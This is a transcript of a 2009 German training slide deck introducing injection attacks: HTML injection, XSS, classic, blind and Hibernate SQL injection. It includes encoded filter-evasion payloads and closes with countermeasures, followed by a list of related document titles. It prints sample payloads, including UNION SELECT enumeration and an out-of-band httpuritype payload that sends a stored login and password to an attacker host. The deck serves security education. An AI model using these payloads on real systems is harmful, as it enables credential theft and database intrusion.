SecureNet GmbH For personal use only. Distribution not allowed.

Save this PDF as:
 WORD  PNG  TXT  JPG

Größe: px
Ab Seite anzeigen:

Download "SecureNet GmbH 2009. For personal use only. Distribution not allowed."

Transkript

1 1

2 Die Datenbank als Erfüllungsgehilfe für Datendiebe Eine Kurzeinführung in Injection-Angriffe Stream Security Ralf Reinhardt,

3 Eine Kurzeinführung in Injection-Angriffe Inhalte HTML-Injection Cross-Site Scripting (XSS) Einschub: Data Validation und Data Sanitation SQL-Injection ( klassisch ) Blind SQL-Injection Advanced SQL-Injection ORM-Injection (Hibernate) Ausblick 3

4 Eine Kurzeinführung in Injection-Angriffe Zielpublikum und Ziel des Vortrages Einsteiger in das Thema Web Application Security Was bitte ist Cross-Site Scripting oder SQL-Injection? Warum funktioniert das eigentlich und was läuft hier schief? Entwickler, Architekten, Verantwortliche, Entscheider Erkennen der Gefahren Verstehen der zugrunde liegenden Problematik Sehen der Lösungsmöglichkeiten Wissen um die richtigen Ansatz-Stellen 4

5 Eine Kurzeinführung in Injection-Angriffe Über Ralf Reinhardt Senior Consultant und Projekt Manager seit 2004 bei der SecureNet GmbH, Frankfurter Ring 193a in München Web Application Security, Penetration Testing, Source Code Analyse Beratung, Schulung, Prozesse, Maßnahmen, Guidelines und Policies Mitglied im Open Web Application Security Project (OWASP.org) und Diplom-Informatiker (FH) Bit Homecomputer Ernsthafte Softwareentwicklung 1994 WWW mit Mosaic, Linux 1995 Pentesting auf System- und Netzwerkebene 1996 HTML 1998 JavaScript 2000 Java, MySQL 2003 J2EE, Oracle DBA 5

6 HTML-Injection 6

7 HTML-Injection Willkommen zurück! 7

8 HTML-Injection Willkommen zurück! Source Code im Browser 8

9 HTML-Injection Willkommen zurück! Source Code auf dem Server 9

10 HTML-Injection Anmeldung 10

11 HTML-Injection Anmeldung Source Code 11

12 HTML-Injection Anmeldung Max Mustermann 12

13 HTML-Injection Willkommen zurück! Max Mustermann 13

14 HTML-Injection Willkommen zurück! Max Mustermann 14

15 HTML-Injection Anmeldung Max M<u>stermann 15

16 HTML-Injection Willkommen zurück! Max M<u>stermann 16

17 HTML-Injection Willkommen zurück! Max M<u>stermann 17

18 Cross-Site Scripting (XSS) 18

19 Cross-Site Scripting (XSS) Anmeldung - <script>alert( XSS );</script> 19

20 Cross-Site Scripting (XSS) Willkommen zurück! - <script>alert( XSS );</script> 20

21 Cross-Site Scripting (XSS) Willkommen zurück! - <script>alert( XSS );</script> 21

22 Cross-Site Scripting (XSS) Arten von Cross-Site Scripting Reflektiertes XSS Existiert nur lokal im Browser des Users Angriffs-Vektor: Link oder Persistentes XSS Wird in der Datenbank / dem Repository persistiert Existiert so lange wie die manipulierten Daten in der DB existieren Angriff-Vektor: Manipulierter Gästebuch-Eintrag 22

23 Cross-Site Scripting (XSS) Mögliche Konsequenzen Spoofing Website-Spoofing Frame-Spoofing Link-Spoofing Phishing Reflektiert oder persistent Durchführbar auch mit gültigem Schloss-Symbol (SSL/TLS) Defacement, DoS, usw. Entstellung der Website Denial of Service U. v. a. m. 23

24 Cross-Site Scripting (XSS) Website Spoofing und SSL institucional.bradesco.com.br institucional.bradesco.com.br E<div style="position:absolute;top:0px;width:2000;left:0px;height:2000;backgroundcolor:white"> <iframe src= width=1000 height=800 style=margin-top:0px; margin-left:0px name=tst frameborder=0> </div> 24

25 Einschub: Data Validation und Data Sanitation 25

26 Data Validation und Data Sanitation Kommunkationswege der Daten Client (meist Browser) Application Server Datenbank 26

27 Data Validation und Data Sanitation Kommunkationswege der Daten, Output zu Input vice versa Client (meist Browser) Output / Input Input / Output Application Server Datenbank Output / Input Input / Output 27

28 Data Validation und Data Sanitation Kommunkationswege der Daten, Boundary Filtering Client (meist Browser) B o u n d a r y Output / Input Input / Output Application Server B o u n d a r y Datenbank B o u n d a r y Output / Input Input / Output Output / Input Input / Output Drittsystem 28

29 Data Validation und Data Sanitation All Input is Evil! Input (ggf. Output) Validation Validatoren überprüfen den korrekten Typ einer Variablen, also z.b.: PLZ» 5 stelliger, positiver Integer kleiner als , ggf. mit führenden Nullen adresse Telefonnummer Datum 29

30 Data Validation und Data Sanitation All Input is Evil! Input (ggf. Output) Sanitation Escaping oder Filterung von Meta-Zeichen: HTML-Escaping JavaScript-Escaping SQL-Escaping XPath, LDAP, Betriebsystem-Pfade, usw. Beispiele <, >,,,, ',.,.., :, /, \, &,(, ), [, ], {, }, %, *,?, _, ; +, -, $,!, \n, \r, \t, eof, ESC, U. v. a. m. 30

31 Data Validation und Data Sanitation All Input is Evil! Input (ggf. Output) Sanitation Filterung oder Veränderung von Schlüsselworten (Blacklisting vs. Whitelisting) HTML / JavaScript: alert, script, img, src, onload, onmouseover SQL: select, union, update, delete, insert, drop, create... U. v. a. m. 31

32 Data Validation und Data Sanitation Anmeldung Max M<u>stermann 32

33 Data Validation und Data Sanitation Willkommen zurück! Max M<u>stermann 33

34 Data Validation und Data Sanitation Willkommen zurück! Max M<u>stermann 34

35 Data Validation und Data Sanitation Anmeldung - <script>alert( XSS );</script> 35

36 Data Validation und Data Sanitation Willkommen zurück! - <script>alert( XSS );</script> 36

37 Data Validation und Data Sanitation Willkommen zurück! - <script>alert( XSS );</script> 37

38 Data Validation und Data Sanitation Exploit of a Mom, 38

39 SQL-Injection ( klassisch ) 39

40 SQL-Injection ( klassisch ) Ein Fallbeispiel (1) plz=' 40

41 SQL-Injection ( klassisch ) Ein Fallbeispiel (2) plz=münchen') UNION SELECT ort,ort,plz,ort,ort,ort FROM gaa WHERE ort LIKE 'München' 41

42 SQL-Injection ( klassisch ) Ein Fallbeispiel (3) plz=münchen') UNION SELECT Object_Name, Object_Name, Object_ID, Object_Name, Object_Name, Object_Name FROM USER_TABLES 42

43 SQL-Injection ( klassisch ) Ein Fallbeispiel (4) BANNER_LISTE BANNER_PAGE BANNER_PICS BANNER_VIEW NEWS DYN_KEY FMONATS FMONATS_DYN FMONATS_KEY FMONAT_PICS FONDS_TOP10 GAA PK_DN_ID SEQ_DN_ID SEQ_GAA_ID SQ_BANNERLISTE SQ_FMONATS SQ_PICID SYS_LOB C00003$$ SYS_LOB C00003$$ UQ_FMONAT_PICS UQ_ZINSKEY ZINSEN ZINSEN2 43

44 SQL-Injection ( klassisch ) Eine reguläre Abfrage an die Datenbank Gegeben sei die Tabelle BENUTZER mit den Spalten ANZEIGENAME FIRMA ORT LOGIN PASSWORT 44

45 SQL-Injection ( klassisch ) Konkatenierte Query im Application Server (Schlecht!) 45

46 SQL-Injection ( klassisch ) Eine reguläre Eingabemaske im Browser 46

47 SQL-Injection ( klassisch ) In Java konkatenierte Query (Schlecht!), Ergebnis 47

48 SQL-Injection ( klassisch ) Input durch den Browser 48

49 SQL-Injection ( klassisch ) Schadhafte Nutzlast 1 49

50 SQL-Injection ( klassisch ) Schadhafte Nutzlast 1, Ergebnis 50

51 SQL-Injection ( klassisch ) Schadhafte Nutzlast 2 51

52 SQL-Injection ( klassisch ) Schadhafte Nutzlast 2, Ergebnis 52

53 Blind SQL-Injection 53

54 Blind SQL-Injection Not at all Blind SQL-Injection: SQL-Injection klassisch 54

55 Blind SQL-Injection Totally Blind SQL-Injection 55

56 Blind SQL-Injection Abgrenzung Ausgangslage Das System liefert keine für den Angreifer brauchbaren Fehlermeldungen, mit denen dieser direkt auf die syntaktische Korrektheit seines Angriffsmuster schließen kann Blind SQL-Injection Leicht unterschiedliche, allgemeine Fehlermeldungen Unterschiedliches Verhalten der Anwendung, Seiteneffekte Totally Blind SQL-Injection Die Antwort des Servers ist immer identisch Es kommt gar keine Antwort 56

57 Blind SQL-Injection Testen auf Blind SQL-Injection, Boole sche Muster 57

58 Blind SQL-Injection Testen auf Blind SQL-Injection, Boole sche Muster 58

59 Blind SQL-Injection Testen auf Blind SQL-Injection, Boole sche Muster 59

60 Blind SQL-Injection Testen auf Blind SQL-Injection, Boole sche Muster 60

61 Blind SQL-Injection Erzwingen von Feedback Erzwingen von Fehlern, z.b. ORA Division by zero Auswerten von Laufzeitunterschieden SELECT COUNT(*) FROM dual; (schnell) SELECT COUNT(*) FROM all_objects; (weniger schnell) Nutzung von Seitenkanälen, Out-of-Band Signalisierung utl_http.request() httpuritype 61

62 Blind SQL-Injection Auswerten von Laufzeitunterschieden Prüfung: If Then Else SELECT COUNT(*) FROM dual; (schnell) SELECT COUNT(*) FROM all_objects; (weniger schnell) 62

63 Blind SQL-Injection Out-of-Band Signalisierung Die Oracle Datenbank verschickt einen HTTP-Request an den Angreifer Angreifer hat lesenden Zugriff auf das Webserver-Logfile von box.attacker.tld Angreifer hat lesenden Zugriff auf das DNServer-Logfile von attacker.tld 63

64 Blind SQL-Injection Out-of-Band Signalisierung Mit der Oracle Datenbank nach Hause telefonieren Ziel: Webserver-Logfile box.attacker.tld Ziel: DNServer-Logsfile attacker.tld 64

65 Blind SQL-Injection Out-of-Band Signalisierung, Eingabe der schadhaften Nutzlast 65

66 Blind SQL-Injection Out-of-Band Signalisierung, Schadhafte Nutzlast NN' UNION SELECT httpuritype(' (SELECT login FROM benutzer WHERE ID = 1) ' Password:' (SELECT passwort FROM benutzer WHERE ID = 1)).getContentType(),NULL, NULL FROM dual -- 66

67 Blind SQL-Injection Out-of-Band Signalisierung, zusammengesetzte Query 67

68 Blind SQL-Injection Out-of-Band Signalisierung, Ergebnis Im Logfiles des Web-Servers landen: Benutzername Passwort Bei einem Direktgespräch ggf. die IP-Adresse der Datenbank 68

69 Advanced SQL-Injection 69

70 Advanced SQL-Injection Abgrenzung Advanced SQL-Injection Ist nicht eindeutig zu definiert Immer dann, wenn es ein wenig anspruchsvoller wird Beispiele Shell-Injection Aufruf von Betriebssystem-Kommandos U. v. a. m Im Rahmen dieses Vortrages Umgehung des Boundary-Filterings Bedingt durch fehlerhafte Validatoren und/oder mangelnde Sanitation und/oder fehlerhaft konfigurierte Web Application Firewall (WAF) 70

71 Advanced SQL-Injection Vielgestaltigkeit von SQL-Statements SELECT 'Test!', COUNT(*) FROM dual; 71

72 Advanced SQL-Injection Übergabe einer Variablen an den Server 72

73 Advanced SQL-Injection Blick in den Source Code eines Formulars 73

74 Advanced SQL-Injection Request mit encodiertem Parameter somevalue (URL 1) somevalue=nn%27+union+select+%27test!%2 7%2C+COUNT(*)+FROM+dual-- 74

75 Advanced SQL-Injection Request mit encodiertem Parameter somevalue (URL 2) somevalue=nn'%20union%20select%20concat (/*%20%20egal%09*/coNCat(%09%09'T'%09,% 20%20chr%20%20(%20%20AsciI%20(%20'e'%20 )%20)%20),concAT(cHR(10%20*% )/**/,chr(116))%20)%20%20%20%20%20%20 %7C%7Cchr(LEAST(33,101,1235,8272)),COUN T(chr(42))%20FROM%20dual%

76 Advanced SQL-Injection Request mit encodiertem Parameter somevalue (Hex) somevalue=%4e%4e%27%20%55%4e%49%4f%4e%2 0%53%45%4C%45%43%54%20%27%54%65%73%74%2 1%27%2C%20%43%4F%55%4E%54%28%2A%29%20%4 6%52%4F%4D%20%64%75%61%6C%2D%2D 76

77 Advanced SQL-Injection Request mit encodiertem Parameter somevalue (Unicode) somevalue=%u004e%u004e%u0027%u0020%u005 5%u004E%u0049%u004F%u004E%u0020%u0053%u 0045%u004C%u0045%u0043%u0054%u0020%u002 7%u0054%u0065%u0073%u0074%u0021%u0027%u 002C%u0020%u0043%u004F%u0055%u004E%u005 4%u0028%u002A%u0029%u0020%u0046%u0052%u 004F%u004D%u0020%u0064%u0075%u0061%u006 C%u002D%u002D 77

78 ORM-Injection (Hibernate) 78

79 ORM-Injection (Hibernate) Object-Relational Mapping, über Hibernate Bekannter O/R-Mapper für Java, Abfrage-Möglichkeiten: Natives SQL Hibernate Query Language (HQL) Criteria Hibernate Query Language (HQL) Die Syntax ist an SQL angelehnt Der Funktionsumfang entspricht nur einer Teilmenge von SQL Es werden nicht Tabellen und Spalten referenziert, sondern Objekte und deren Attribute Der UNION-Operator wird nicht unterstützt 79

80 ORM-Injection (Hibernate) Ein Beispiel aus der Praxis Gegeben sei die Tabelle BENUTZER mit den Spalten LOGIN (der Login-Name, z.b. admin ) PASSWORT (das zugehörige Passwort, z.b. nim23da ) Gegeben sei die Klasse User.java mit den Attributen userloginname (der Login-Name, z.b. admin ) userpasswort (das zugehörige Passwort, z.b. nim23da ) Gegeben sei das Mapping LOGIN userloginname PASSWORT userpasswort 80

81 ORM-Injection (Hibernate) Ein Beispiel aus der Praxis Es existiert eine Funktion, die es dem Benutzer ermöglicht, seinen Login-Namen zu ändern Vor dem eigentlichen Update schaut die Anwendung nach, ob es einen Benutzer mit diesem Login-Namen bereits gibt Gibt es den gewünschten Login-Namen bereits, so wird die Aktion abgebrochen und der Benutzer erhält die Fehlermeldung Loginname existiert bereits! 81

82 ORM-Injection (Hibernate) Die Suche nach existierenden Login-Namen Feststellungen: Die Anfrage ist in HQL geschrieben und entspricht etwa einem effizienten select count(*) from... suserloginname ist der Input kommend vom Browsers des Users Das Objekt u ist eine Instanz der Klasse User Ist lcount größer als Null, so ist der Loginname bereits vergeben (und die Fehlermeldung Loginname existiert bereits! erscheint) Durch die Konkatenation existiert eine Injection-Schwachstelle 82

83 ORM-Injection (Hibernate) Enumeration von Benutzern Loginname existiert bereits! 83

84 ORM-Injection (Hibernate) Ein kurzer Test mit UNION Loginname existiert bereits! 84

85 ORM-Injection (Hibernate) Passwort-Enumeration (1) 85

86 ORM-Injection (Hibernate) Passwort-Enumeration (1), HQL-Statement SELECT COUNT(u) FROM User u WHERE u.userloginname = admin' and u.userpassword like '%' union 86

87 ORM-Injection (Hibernate) Passwort-Enumeration (1) Loginname existiert bereits! 87

88 ORM-Injection (Hibernate) Passwort-Enumeration (2) Loginname existiert bereits! 88

89 ORM-Injection (Hibernate) Passwort-Enumeration (3) Loginname existiert bereits! 89

90 ORM-Injection (Hibernate) Passwort-Enumeration (4) Loginname existiert bereits! 90

91 Generelle Injection-Problematik Quintessenz Keine zusammengesetzte Queries! Keine Dynamik! Umgehung des SQL-Interpreters, z.b. durch ausschließliche Verwendung gebundener Parameter in Prepared Statements (keine Stored Procedures!) Korrekt verwendete O/R-Mapper Wirksames Boundary Filtering! All Input is Evil! Input / Output Validation Input / Output Sanitation Dies betrifft nicht nur SQL! LDAP-Injection XPath-Injection U. v. a. m. 91

92 Ausblick 92

93 Ausblick Rückblick Boundary Filtering Client (meist Browser) B o u n d a r y Output / Input Input / Output Application Server B o u n d a r y Datenbank B o u n d a r y Output / Input Input / Output Output / Input Input / Output Drittsystem 93

94 Ausblick Maßnahmen bei Systemen in Wartung Vulnerability-Assessment ( Max M<u>stermann ) Web Application Security Penetration Test Code Review (und Fixing!) Source Code Analyse (und Fixing!) Awareness-Maßnahmen, Schulungen, Workshops Secure Coding Guidelines / Policies Secure Software Development Lifecycle / Prozesse 94

95 Ausblick Maßnamen bei Legacy-Systemen: Web Application Firewalls Client (meist Browser) B o u n d a r y Output / Input Input / Output WAF Application Server B o u n d a r y Datenbank B o u n d a r y Output / Input Input / Output Output / Input Input / Output Drittsystem WAF WAF 95

96 Vielen Dank! Fragen? Anregungen? SecureNet GmbH Frankfurter Ring 193a D München +49 (0)89 / Ralf Reinhardt Web Application Security Penetration Testing, Source Code Analyse, Maßnahmen-Beratung Softwareentwicklung Entwicklung sicherer Webanwendungen 96

97 97

SecureNet GmbH For personal use only. Distribution not allowed.

SecureNet GmbH For personal use only. Distribution not allowed. 1 Die Datenbank als Erfüllungsgehilfe für Datendiebe Eine Kurzeinführung in Injection-Angriffe DOAG Regionaltreffen Südbayern FH München, Raum R 1.046 Ralf Reinhardt, 21.04.2010, 17:30 http://www.securenet.de

Mehr

Hacker-Tool Browser von der Webanwendung zu den Kronjuwelen

Hacker-Tool Browser von der Webanwendung zu den Kronjuwelen Hacker-Tool Browser von der Webanwendung zu den Kronjuwelen Ralf Reinhardt 28.11.2013, 16:40 Uhr Roadshow Sicheres Internet aiti-park Werner-von-Siemens-Str. 6 86159 Augsburg 1 Hacker-Tool Browser Über

Mehr

Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10

Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10 The OWASP Foundation http://www.owasp.org Absicherung von Web-Anwendungen in der Praxis Highlights aus den OWASP TOP 10 Tobias Glemser tobias.glemser@owasp.org tglemser@tele-consulting.com Ralf Reinhardt

Mehr

Sicherheit in Webanwendungen CrossSite, Session und SQL

Sicherheit in Webanwendungen CrossSite, Session und SQL Sicherheit in Webanwendungen CrossSite, Session und SQL Angriffstechniken und Abwehrmaßnahmen Mario Klump Die Cross-Site -Familie Die Cross-Site-Arten Cross-Site-Scripting (CSS/XSS) Cross-Site-Request-Forgery

Mehr

DIE DATENBANK ALS ERFÜLLUNGSGEHILFE FÜR DATENDIEBE

DIE DATENBANK ALS ERFÜLLUNGSGEHILFE FÜR DATENDIEBE Whitepaper DIE DATENBANK ALS ERFÜLLUNGSGEHILFE FÜR DATENDIEBE Eine Kurzeinführung in Injection Angriffe Ralf Reinhardt, SecureNet GmbH, Nov 2009 S CHLÜSSELWORTE Injection, SQL-Injection, SQLI, Blind SQL-Injection,

Mehr

Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus?

Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus? Schwachstellen in Web- Applikationen: Was steckt dahinter und wie nutzt man sie aus? Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Einführung in Web-Security

Einführung in Web-Security Einführung in Web-Security Alexander»alech«Klink Gulaschprogrammiernacht 2013 Agenda Cross-Site-Scripting (XSS) Authentifizierung und Sessions Cross-Site-Request-Forgery ([XC]SRF) SQL-Injections Autorisierungsprobleme

Mehr

SQL-Injection. Seite 1 / 16

SQL-Injection. Seite 1 / 16 SQL-Injection Seite 1 / 16 Allgemein: SQL (Structured Query Language) Datenbanksprache zur Definition von Datenstrukturen in Datenbanken Bearbeiten und Abfragen von Datensätzen Definition: SQL-Injection

Mehr

Informationstechnik & System-Management SQL INJECTION. Selbstgemachte Sicherheitslücken. SQL-Injection ITSB2006 Michael Donabaum

Informationstechnik & System-Management SQL INJECTION. Selbstgemachte Sicherheitslücken. SQL-Injection ITSB2006 Michael Donabaum SQL INJECTION Selbstgemachte Sicherheitslücken Beschreibung SQL-Injection SQL-Einschleusung Ausnutzen von Sicherheitslücken in Zusammenspiel mit SQL-Datenbanken Mangelnde Maskierung von Metazeichen \ ;

Mehr

BSI IT-Grundschutztag, 13.06.2013, Regensburg 2013 by sic[!]sec GmbH in Groebenzell, Germany. - For personal use only. - http://www.sicsec.

BSI IT-Grundschutztag, 13.06.2013, Regensburg 2013 by sic[!]sec GmbH in Groebenzell, Germany. - For personal use only. - http://www.sicsec. 1 BSI Grundschutzbaustein Webanwendungen Absicherung von Webanwendungen in der Praxis - Highlights aus den OWASP Top 10 Ralf Reinhardt 13.06.2013, 13:30 Uhr BSI IT-Grundschutztag Tagungs- und Besucherzentrum

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen FAEL-Seminar Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Prof. Dr. Marc Rennhard Institut für angewandte Informationstechnologie InIT ZHAW Zürcher Hochschule für Angewandte

Mehr

Konzept eines Datenbankprototypen. 30.06.2003 Folie 1 Daniel Gander / Gerhard Schrotter

Konzept eines Datenbankprototypen. 30.06.2003 Folie 1 Daniel Gander / Gerhard Schrotter Konzept eines Datenbankprototypen 30.06.2003 Folie 1 Daniel Gander / Gerhard Schrotter Inhalt (1) Projektvorstellung & Projektzeitplan Softwarekomponenten Detailierte Beschreibung der System Bausteine

Mehr

Grundlagen der Informatik 2

Grundlagen der Informatik 2 Grundlagen der Informatik 2 Dipl.-Inf., Dipl.-Ing. (FH) Michael Wilhelm Hochschule Harz FB Automatisierung und Informatik mwilhelm@hs-harz.de Raum 2.202 Tel. 03943 / 659 338 1 Gliederung 1. Einführung

Mehr

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn

Aktuelle Angriffstechniken. Steffen Tröscher cirosec GmbH, Heilbronn Aktuelle Angriffstechniken Steffen Tröscher cirosec GmbH, Heilbronn Gliederung Angriffe auf Webanwendungen Theorie und Live Demonstrationen Schwachstellen Command Injection über File Inclusion Logische

Mehr

Softwaresicherheit. Eine Präsentation von Benedikt Streitwieser und Max Göttl. Einführung Kryptographie und IT-Sicherheit

Softwaresicherheit. Eine Präsentation von Benedikt Streitwieser und Max Göttl. Einführung Kryptographie und IT-Sicherheit Softwaresicherheit Eine Präsentation von Benedikt Streitwieser und Max Göttl Einführung Kryptographie und IT-Sicherheit Gliederung Einleitung: Was ist Softwaresicherheit Populäre Beispiele Anforderungen

Mehr

Aktuelle Sicherheitsprobleme im Internet

Aktuelle Sicherheitsprobleme im Internet Herbst 2014 Aktuelle Sicherheitsprobleme im Internet Wirtschaftsinformatik: 5. Semester Dozenten: Rainer Telesko / Martin Hüsler Fachhochschule Nordwestschweiz FHNW / Rainer Telesko - Martin Hüsler 1 Inhalt

Mehr

Web Applications Vulnerabilities

Web Applications Vulnerabilities Bull AG Wien Web Applications Vulnerabilities Philipp Schaumann Dipl. Physiker Bull AG, Wien www.bull.at/security Die Problematik Folie 2 Der Webserver ist das Tor zum Internet auch ein Firewall schützt

Mehr

php Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe...

php Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe... php Hier soll ein Überblick über das Erstellen von php Programmen gegeben werden. Inhaltsverzeichnis 1.Überblick...2 2.Parameterübergabe...7 3.Zugriff auf mysql Daten...11 Verteilte Systeme: php.sxw Prof.

Mehr

Web Application Security: SQL-injection, Cross Site Scripting -- w3af

Web Application Security: SQL-injection, Cross Site Scripting -- w3af Web Application Security: SQL-injection, Cross Site Scripting -- w3af 1 Web 2.0 Application und Angriffspunkte Grundlagen: SQL SQL-injection Cross Site Scripting Web Application Scans mit w3af 2 Eine Web

Mehr

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte

Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In) Security PHPUG Würzburg 29.06.2006 Björn Schotte Web 2.0 (In)Security - Themen Alte Freunde SQL Injections, Code Executions & Co. Cross Site Scripting Cross Site Scripting in der Praxis JavaScript

Mehr

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen Dr. Marc Rennhard Institut für angewandte Informationstechnologie Zürcher Hochschule Winterthur marc.rennhard@zhwin.ch Angriffspunkt

Mehr

14.05.2013. losgeht s

14.05.2013. losgeht s losgeht s 1 Agenda erläutern 2 Warum jetzt zuhören? 3 BSI-Quartalsbericht 4/2010 Die gefährlichsten Schwachstellen in Webauftritten Häufig wurden SQL-Injection(Weiterleitung von SQL-Befehlen an die Datenbank

Mehr

Aktuelle Bedrohungen im Internet

Aktuelle Bedrohungen im Internet Aktuelle Bedrohungen im Internet Max Klaus, MELANI Bedrohungen von Webanwendungen Reto Inversini, BIT Botnetze webreaders.de/wp-content/uploads/2008/01/botnetz.jpg ISB / NDB Melde- und Analysestelle Informationssicherung

Mehr

JSP JSTL. JEE Vorlesung Teil 6. Ralf Gitzel ralf_gitzel@hotmail.de

JSP JSTL. JEE Vorlesung Teil 6. Ralf Gitzel ralf_gitzel@hotmail.de JSP JSTL JEE Vorlesung Teil 6 Ralf Gitzel ralf_gitzel@hotmail.de 1 Übersicht Ralf Gitzel ralf_gitzel@hotmail.de 2 Übersicht Wiederholung / Vertiefung JSTL Grundlagen JSTL Basisbefehle Templates über JSTL

Mehr

Datenbanken. Ein DBS besteht aus zwei Teilen:

Datenbanken. Ein DBS besteht aus zwei Teilen: Datenbanken Wikipedia gibt unter http://de.wikipedia.org/wiki/datenbank einen kompakten Einblick in die Welt der Datenbanken, Datenbanksysteme, Datenbankmanagementsysteme & Co: Ein Datenbanksystem (DBS)

Mehr

Sicherheit von Webapplikationen Sichere Web-Anwendungen

Sicherheit von Webapplikationen Sichere Web-Anwendungen Sicherheit von Webapplikationen Sichere Web-Anwendungen Daniel Szameitat Agenda 2 Web Technologien l HTTP(Hypertext Transfer Protocol): zustandsloses Protokoll über TCP auf Port 80 HTTPS Verschlüsselt

Mehr

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity 8.3.2011 Secure Coding & Live Hacking von Webapplikationen Conect Informunity 8.3.2011 Dr. Ulrich Bayer Security Research Sicherheitsforschung GmbH Motivation Datendiebstahl über (Web)-Applikationen passiert täglich

Mehr

Web-Sicherheit: Kein fauler Zauber?! Kai Jendrian. <Seminartitel> <Seminartitel>

Web-Sicherheit: Kein fauler Zauber?! Kai Jendrian. <Seminartitel> <Seminartitel> Web-Sicherheit: Kein fauler Zauber?! Security Consulting GmbH, Karlsruhe Seite 1 Security Consulting GmbH, Karlsruhe Seite 2 Security Consulting GmbH, Karlsruhe Seite 3 Security

Mehr

OWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes

OWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes OWASP Stammtisch München Sep 2014 XSS und andere Sicherheitslücken aus der Perspektive des Programmcodes 1 XSS: Cross-Site Scripting 1.) Es gelangen Daten in den Web-Browser, die Steuerungsinformationen

Mehr

MySQL 101 Wie man einen MySQL-Server am besten absichert

MySQL 101 Wie man einen MySQL-Server am besten absichert MySQL 101 Wie man einen MySQL-Server am besten absichert Simon Bailey simon.bailey@uibk.ac.at Version 1.1 23. Februar 2003 Change History 21. Jänner 2003: Version 1.0 23. Februar 2002: Version 1.1 Diverse

Mehr

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink Hacker-Methoden in der IT- Sicherheitsausbildung Dr. Martin Mink Hacker-Angriffe 3.11.2010 Hacker-Methoden in der IT-Sicherheitsausbildung Dr. Martin Mink 2 Typische Angriffe auf Web- Anwendungen SQL Injection

Mehr

Datenbanken für Online Untersuchungen

Datenbanken für Online Untersuchungen Datenbanken für Online Untersuchungen Im vorliegenden Text wird die Verwendung einer MySQL Datenbank für Online Untersuchungen beschrieben. Es wird davon ausgegangen, dass die Untersuchung aus mehreren

Mehr

Betroffene Produkte: Alle Versionen von Oracle Forms (3.0-10g, C/S und Web), Oracle Clinical, Oracle Developer Suite

Betroffene Produkte: Alle Versionen von Oracle Forms (3.0-10g, C/S und Web), Oracle Clinical, Oracle Developer Suite Zusammenfassung: Alle Oracle Forms Anwendungen sind per Default durch SQL Injection angreifbar. Oracle Applications >=11.5.9 ist davon nicht betroffen, da hier standardmäßig der Wert FORMSxx_RESTRICT_ENTER_QUERY

Mehr

Web Application Security

Web Application Security Web Application Security Was kann schon schiefgehen. Cloud & Speicher Kommunikation CMS Wissen Shops Soziale Netze Medien Webseiten Verwaltung Chancen E-Commerce Kommunikation Globalisierung & Digitalisierung

Mehr

Datensicherheit. Vorlesung 5: 15.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter

Datensicherheit. Vorlesung 5: 15.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter Datensicherheit Vorlesung 5: 15.5.2015 Sommersemester 2015 h_da, Lehrbeauftragter Inhalt 1. Einführung & Grundlagen der Datensicherheit 2. Identitäten / Authentifizierung / Passwörter 3. Kryptografie 4.

Mehr

SQL Injection Funktionsweise und Gegenmaßnahmen

SQL Injection Funktionsweise und Gegenmaßnahmen SQL Injection Funktionsweise und Gegenmaßnahmen EUROSEC GmbH Chiffriertechnik & Sicherheit Tel: 06173 / 60850, www.eurosec.com EUROSEC GmbH Chiffriertechnik & Sicherheit, 2005 Problematik SQL-Injection

Mehr

Angreifbarkeit von Webapplikationen

Angreifbarkeit von Webapplikationen Vortrag über die Risiken und möglichen Sicherheitslücken bei der Entwicklung datenbankgestützter, dynamischer Webseiten Gliederung: Einführung technische Grundlagen Strafbarkeit im Sinne des StGB populäre

Mehr

Prozedurale Datenbank- Anwendungsprogrammierung

Prozedurale Datenbank- Anwendungsprogrammierung Idee: Erweiterung von SQL um Komponenten von prozeduralen Sprachen (Sequenz, bedingte Ausführung, Schleife) Bezeichnung: Prozedurale SQL-Erweiterung. In Oracle: PL/SQL, in Microsoft SQL Server: T-SQL.

Mehr

Sicher sein, statt in Sicherheit wiegen Sicherheit bei. Web-Anwendungen. Vortrag bei Infotech 08.06.2015

Sicher sein, statt in Sicherheit wiegen Sicherheit bei. Web-Anwendungen. Vortrag bei Infotech 08.06.2015 Sicher sein, statt in Sicherheit wiegen Sicherheit bei Web-Anwendungen Vortrag bei Infotech 08.06.2015 2 Ist Sicherheit bei Web-Anwendungen ein Thema? 3 Zusammenfassung Verizon Data-Breach-Report 2014,

Mehr

Wo finde ich die Software? - Jedem ProLiant Server liegt eine Management CD bei. - Über die Internetseite http://www.hp.

Wo finde ich die Software? - Jedem ProLiant Server liegt eine Management CD bei. - Über die Internetseite http://www.hp. Erfahrungen mit dem Insight Manager von HP Dipl. Ing. Elektrotechnik (FH) - Automatisierungs- / Regelungstechnik DV-Spezialist Landesbank Rheinland-Pfalz Abteilung 2-351 Große Bleiche 54-56 55098 Mainz

Mehr

